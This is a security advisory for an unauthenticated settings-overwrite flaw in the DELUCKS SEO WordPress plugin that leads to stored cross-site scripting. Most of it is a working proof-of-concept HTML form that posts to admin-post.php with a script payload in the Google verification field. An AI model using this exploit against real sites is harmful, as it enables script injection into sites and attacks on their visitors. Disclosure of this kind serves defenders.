#VU21333 Improper access control in DELUCKS SEO
Published: September 25, 2019
Vulnerability identifier: #VU21333
Vulnerability risk: High
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:A/U:Amber
CVE-ID: N/A
CWE-ID: CWE-284
Exploitation vector: Remote access
Exploit availability:
The vulnerability is being exploited in the wild
Vulnerable software:
DELUCKS SEO
DELUCKS SEO
Software vendor:
DELUCKS GmbH
DELUCKS GmbH
Description
The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.
The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote non-authenticated attacker can bypass implemented security restrictions and execute arbitrary JavaScript code on the website.
Note: this vulnerability is being actively exploited in the wild.
PoC:
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="dpc_save_settings" />
<input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" />
<input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][desc]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" />
<input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" />
<input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" />
<input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" />
<input type="submit" value="Submit" />
</form>
</body>
</html> Remediation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.